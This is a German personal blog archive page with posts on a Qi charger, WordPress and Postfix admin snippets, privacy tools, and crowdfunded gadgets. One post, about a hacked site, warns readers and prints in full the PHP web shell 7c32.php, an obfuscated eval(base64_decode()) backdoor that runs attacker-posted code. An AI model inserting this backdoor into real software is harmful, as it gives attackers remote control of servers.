Kategorien
In eigener Sache

Problem mit Qi Ladegerät

Qi Ladegerät

Seit einiger Zeit habe ich mir so einen kleinen Puck neben das Bett gestellt, der mir nachts das Smartphone drahtlos laden soll. Macht er auch hervorragend, nur scheint es eine Eigenheit von Qi (oder auch nur diesem Ladegerät?) zu sein, dass nach einer vollständigen Ladung abgeschaltet wird. Das heißt mein Smartphone war dann morgens schon 6-7 Stunden im Standby und der Akku zeigt z.B. nur noch 80% an.

Ist das normal? Gibt es keine Erhaltungsladung per Qi? Und wenn ich schon mal dabei bin … ich überlege mir gerade so etwas auch für’s Auto anzuschaffen. Da wäre es schon super, wenn die Halterung ständig lädt und vor allem wenn sie genügend Strom liefern würde um das Display und Navi gleichzeitig laufen lassen zu können ohne Akkuladung zu verlieren. Das schafft mein Autoradio-USB-Anschluss (obwohl mit 1A beworben) nämlich leider nicht :/

Kategorien
In eigener Sache

WordPress Facebook Plugin: FB Connect Javascript entfernen

Um meine Blogbeiträge sowohl auf meiner Facebook Fanseite als auch meinem eigenen Profil parallel zu veröffentlichen nutze ich das WordPress Facebook Plugin. Da ich in meinem Blog keiner der zusätzlichen Features wie „Like Buttons“ oder andere Dinge, die Facebook Connect erfordern nutze, lädt deren Javascript vollkommen umsonst und ist auch ein kleines Datenleck, das gestopft werden möchte.

Damit es nicht mehr geladen wird habe ich in der functions.php meines Themes folgendes ans Ende geschrieben:

// FB Plugin connect killer
function kill_fb_connect() {
wp_deregister_script( 'facebook-jssdk' );
}
function kill_fb_dns_prefetch() {
remove_action( 'wp_head', array( 'Facebook_Loader', 'dns_prefetch_js_sdk' ), 1 );
}

add_action( ‚wp_print_scripts‘, ‚kill_fb_connect‘ );
add_action( ‚wp_head‘, ‚kill_fb_dns_prefetch‘, 0 );

Vielleicht hilft es jemandem … mindestens jedoch mir, wenn ich wieder vergessen habe wie das geht nachdem ich das nächste Mal das Theme gewechselt habe ;-)

Kategorien
In eigener Sache Spam

Mails aus Postfix Mailqueue für eine bestimmte Emailadresse löschen

Mit diesem Code kann man aus der Mailqueue von Postfix alle Mails einer bestimmten Adresse löschen. Das kann relevant werden, wenn euer Server ein Spamzombie geworden ist und noch einige tausend Mails in der Ausgangswarteschlange liegen, die nicht zugestellt werden konnten.

postqueue -p | awk 'BEGIN { RS = "" } { if($7 == "example@mail.com") print $1 }' | tr -d '*!' | postsuper -d -

Sortiert die Mail IDs aus der Warteschlange (postqueue -p) heraus und übergibt sie an postsuper zur Löschung.

Kategorien
In eigener Sache

Über 7c32.php und Mailspam

Der Server auf dem dieses Blog läuft, hostet auch einige andere Webseiten. Eine davon wurde gehackt und hat die letzten Tage unglaubliche Mengen an Spammails versendet. Kann passieren und passiert tatsächlich auch recht oft. Nur dieses Mal war es einfach eine Datei namens 7c32.php, die per FTP hochgeladen wurde und keine Sicherheitslücke von WordPress oder was auch immer man so laufen hat. Davor eine Datei ftpchk3.php um zu prüfen, ob das FTP Verzeichnis auch per Web erreichbar ist.

Der Angreifer wusste also den Benutzernamen, das Passwort und auf welcher Domain dieses Skript laufen würde und hat das genutzt um mit der PHP Funktion mail() Spam zu verschicken. Mitgeschnitten in einem Wifi Netz? Gezielter Hack? Trojaner? Wir wissen es nicht.

Das scheint übrigens ein älterer und vermutlich automatisierter Angriff zu sein. Eine Googlesuche nach 7c32.php bringt einige viele Suchergebnisse, die zum Teil bis 2012 zurückreichen.

Wie dem auch sei … einfach mal in der eigenen Installation von was auch immer (WordPress, Joomla, Webseite mit PHP) nach einer Datei 7c32.php (im Unterverzeichnis css) suchen. Die Datei ftpchk3.php wurde vom Angreifer wieder gelöscht, laut Netz enthält sie aber auch nur den Code:
echo "OK"

Be safe!

P.S.: Der Inhalt von 7c32.php:
< ? php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ? >

Kategorien
In eigener Sache

Ich teste gerade die verschiedenen Formatvorlagen von WordPress!

Ich teste gerade die verschiedenen Formatvorlagen von WordPress!

Kategorien
In eigener Sache

Neues Theme

In der Hoffnung gegen Blogtiefschlaf und Sommerloch anzukämpfen habe ich mal auf das neue WordPress Theme Twenty Thirteen umgestellt. Sieht gut aus und hat einige Formatvorlagen, die ich hiermit mal ausprobiere. Das ist eine Kurzmitteilung ;-)

Kategorien
In eigener Sache Web 2.0

Kann man eigentlich „cloudfrei“ leben?

Wir werden totalüberwacht! Das ist Fakt und liegt auch daran, dass sich kaum jemand über Verschlüsselung Gedanken macht (meinen öffentlichen PGP Schlüssel findet ihr auf der Kontaktseite) und fröhlich Dienste von verschiedenen Webseiten nutzt.

Bei vielen Diensten kann man nichts dagegen unternehmen, denn wenn ich bei Amazon einkaufen möchte, dann muss ich mit deren Webseite interagieren. Möchte ich Google Dienste wie App Engine nutzen oder einen anderen Hosting Dienst ist das ebenso der Fall. In diesem Fall kann ich allerdings auf dem Server alles verschlüsselt ablegen (sofern er nur als Speicher verwendet wird, wenn er die Daten verarbeiten soll, geht das natürlich nicht komplett).

Kommen wir langsam zum Punkt. E-Mails, Instant Messaging, Telefongespräche, Terminplan, Datenspeicher … kann man das sicher – also verschlüsselt – und ohne „Cloud“ benutzen?

  • Email: hier gibt es Ende-zu-Ende Verschlüsselung schon seit Anbeginn der Zeit. PGP/OpenPGP/GnuPG machen es möglich. Der Aufwand ist recht niedrig, aber trotzdem benutzt es keiner wirklich. Deshalb wäre zumindest die Ablage der Mails auf dem eigenen Server in einen verschlüsselten Container (pro Nutzer!) sinnvoll. Web Emaildienste sollten tabu sein.
  • Instant Messaging: Whatsapp & Co haben diverse Lücken. Als Alternativen bieten sich z.B. Threema (meine ID dort: B327U2MZ) oder Whistle.im an. Beide noch nicht so ausgereift wie die etablierten Messenger, aber dafür wird die Kommunikation verschlüsselt!
  • Telefon: das ist eine schwierige Sache … GSM ist ja eigentlich schon verschlüsselt, aber natürlich kann das auch abgehört werden. Eine Ende-zu-Ende Verschlüsselung ist da mit normalen Smartphones relativ schwer möglich, aber es gibt ja noch VoIP. RedPhone sieht nach einer interessanten App aus, das zu ermöglichen … oder man verwendet eine erfundene Codesprache? ;-)
  • Terminplan, Todolisten, etc könnten gut mit einer Software namens Owncloud funktionieren. Lokal oder bei einem Hoster installiert kann man damit ziemliche viele Clouddienste nachbilden und so der allgemeinen Totalüberwachung entkommen.
  • Daten: ebenfalls Owncloud, eigener Server, verschlüsselte Uploads, etc

Es wäre also möglich die Kommunikation mit seinen Mitmenschen komplett abhörsicher ablaufen zu lassen und ich bin mir sicher, dass die wirklich bösen Buben schon schlau genug sind ebenfalls abhörsicher zu kommunizieren. Die Überwachung trifft also nur Dumme und verletzt Grundrechte … und auch wenn es kein guter Vergleich ist, es ist ein wenig wie bei DRM: die bösen Raubkopierer kriegen davon nicht mit und der ehrliche Kunde hat nur Probleme damit und Einschränkungen ohne Ende.

Und wie seht ihr das? Kommunikation egal genug, dass sie komplett für spätere Ermittlungen aufgezeichnet werden darf (Stichwort: ich hab ja nichts zu verbergen … *würg*)? Oder doch vielleicht versuchen Freunde zu überzeugen ein wenig mehr darauf zu achten?

P.S.: Ausnahmen bestätigen die Regel oder so … bevor mir jemand damit kommt, dass ich hier blogge und auf Facebook, Instagram, Twitter, Google+ und in diversen Foren und Mailingslisten quasi-öffentlich schreibe und Bilder hochlade … ja, das ist aber gewollt so! Mag sein, dass man so auch ein Profil von einer Person erstellen kann, aber es fehlt ein ganz entscheidender Teil und über dessen Verteilung/Nutzung – wie man nun spätestens seit Snowden weiß – hat man keine Kontrolle mehr … außer Abschalten und die Kommunikation komplett einzustellen oder eben Verschlüsselung. Verstanden?

Kategorien
Android Projekt In eigener Sache

Android Projekt

Ein Blog will mit Inhalten gefüllt werden und ich, der für Redeflashs bekannt ist, muss jetzt einfach mal ein paar Sachen runterschreiben ;-)

Android! Ich mag Android und habe schon einiges dafür gemacht, aber bis auf die Illusions Uhr nichts was ich selbst veröffentlicht habe. Das soll sich ändern und ich will darüber bloggen. Wöchentlich, alle zwei Wochen, egal … ihr sollt teilhaben.

Was wird es werden? Das weiß ich noch nicht so recht. Etwas simples! Ein Spiel? Vielleicht. In den letzten Wochen habe ich ein wenig mit dem Rift Devkit herumgespielt und auch eine rudimentäre Android Bibliothek dafür geschrieben, d.h. eventuell wäre es Spiel mit 3D Grafik (und Rift Unterstützung für den speziellen Kick) angebracht.

Damit auch ein richtiger Anreiz da, sollte das Spiel bzw. die App nicht kostenlos sein. Bezahl-App oder Free-to-play oder Werbeeinblendungen? Ihr werdet es hier erfahren (ob und wie und überhaupt man vom Google Play Store direkt leben kann oder es eher nicht so einfach ist) ;-)

Edit: zusammen mit Andreas habe ich schon mal so etwas versucht – eine Telefonwählton Musik App. Ich denke ich werde zuerst einmal diese App aufpolieren und fertigstellen.

Kategorien
In eigener Sache

2013: das Crowdfunding Jahr?

Eigentlich hat das Thema Crowdfunding ja schon letzten so richtig abgehoben. Projekte nahmen Millionen an Startfinanzierung über Seiten wie Kickstarter und Indiegogo ein, aber so gut wie alle haben ihren Zeitplan komplett unterschätzt und warum sollte es ihnen auch anders ergehen als anderen Zeit- und Kostenabschätzern auf dieser Welt? ;-)

Warum ist nun dieses Jahr das Jahr oder besser mein Jahr? Naja, weil einige der Projekte endlich liefern bzw. Liefertermin genannt haben.

Pebble

Watchfaces

Die Smartwatch Pebble liefert schon seit Ende Januar, aber noch sagt mein Account „Processing Shipment“. Wie viele Pebbles schon ausgeliefert wurden kann man auf dieser Webseite sehen. Derzeit knapp 30000 produziert und 15000 versendet. Die Software der Uhr soll erweiterbar sein, aber bisher gibt es noch kein SDK von den Machern und das eigentlich schon länger angekündigte ist erstmal nur dazu da Ziffernblätter für die Uhrenfunktion zu erstellen. Ein Anfang, aber das Jahr ist ja noch jung.

Oculus Rift

Oculus Rift in action

Mitte März ist der nun genannte Liefertermin für die VR-Brille Oculus Rift. Auch hier wird es vermutlich noch einige Wochen länger dauern, bis wirklich jeder sein Entwicklerkit in der Hand hält. Ich bin jedenfalls sehr gespannt und hoffe damit eine u.a. auch eine gute FPV-Lösung zu bekommen. Wenn ein Raspberry Pi reichen sollte um das empfangene Videosignal vom Modellflieger so zu verzerren, dass es für die Brille passt und per HDMI auszugeben, wäre das spitze. Für Flugzeuge könnte die Latenz dieser Umwandlungen noch ok sein. Beim Quadrocopter vielleicht nur im GPS/Levelmodus? Man wird sehen. Eine kleine einhergehende Revolution im Videospielebereich wäre auch mal wieder angebracht. Spricht ja nichts dagegen, dass PS4 und Xbox361 das nicht auch unterstützen könnten ;-)

Makibox

#MakiBox A6 - Beta Update, Improved Printing

Das ist ein sehr eigenartiges Projekt geworden. Letzten Februar hat jemand auf dem Barcamp Nürnberg davon geschwärmt und nach einigem Zögern habe ich die Makibox mitfinanziert, weil es ein wirklich günstiger 3D Drucker werden sollte. Leider hat sich das Team dort etwas verrannt (wenn auch in interessante Dinge, die ja auch durchaus hätten einfach funktionieren können) und so gibt es immer noch keinen Liefertermin. Aber immerhin sind jetzt mal ein paar BETA Geräte im Aufbau. Es kann sich nur noch um Monate handeln, wenn ich dann noch weiß wofür ich damals einen 3D Drucker haben wollte. Nein, Spaß beiseite, das Thema ist interessant und ich bin gespannt.

Leap Motion

Leap Motion

Leap Motion ist so ein kleines Kinect-artiges Gerät, dass man sich vor den Monitor legt und dann erkennt es die Finger und das sehr sehr genau, so dass es sich für Gestensteuerungen eignet. Der Vorbestellpreis lag bei nur 80 Dollar und ich habe leider keines der 12000 Entwicklerkits, die bereits ausgesendet wurden (wirklich? Wo sind die ganzen Meldungen darüber?), abbekommen. Liefertermin ist nun Mitte Mai. Auch hier bin ich sehr gespannt. Ob ich damit mehr anstelle, als es nur als Touchscreenersatz (vielleicht im Auto am Car PC?) zu verwenden, weiß ich allerdings noch nicht.

Das Jahr bzw. der Spätfrühling/Frühsommer könnte interessant werden. Lauter hübsches Spielzeug im Anflug und bis dahin sollte auch das Projekt Millenium Falcon aus Lego fertiggestellt sein.

Wie sieht das bei euch aus? Habt ihr euch letztes Jahr an einem Crowdfunding Projekt beteiligt? Wann bekommt ihr eure Goodies?

Kategorien
In eigener Sache

Pebble Watch Lieferdatum

Endlich ist es so weit. In einem Kickstarterupdate und via Live Presse Konferenz hat das Team um Pebble (E-Paper Smartwatch) einen Liefertermin für die Uhr genannt. Und zwar den 23. Januar!

Angeblich sollen pro Woche 15000 Pebbles hergestellt werden, d.h. die Kickstarter Pledges dürften bis Ende Februar abgearbeitet sein und mit Lieferung aus China und Zollwartezeiten sollte die Uhr also spätestens im März hier aufschlagen. Ich bin gespannt ;-)

Außerdem neu:

  • Magnetometer für Kompassfunktion – das könnte für Navigationsapps und Geocaching interessant sein
  • Helligkeitssensor … hmmm nunja
  • Der Beschleunigungssensor scheint nicht viel Strom zu brauchen, wenn man ihn dazu benutzen kann per Schütteln der Uhr die Hintergrundbeleuchtung anzuschalten, d.h. man könnte damit so eine Art Fitnessapp wie die von Nike (FuleBand) nachbauen

Leider gibt es noch kein offizielles SDK und es wird erstmal nur möglich sein Ziffernblätter-Apps zu bauen. Aber immerhin, so kann ich vielleicht meine Illusionsuhr portieren ;-)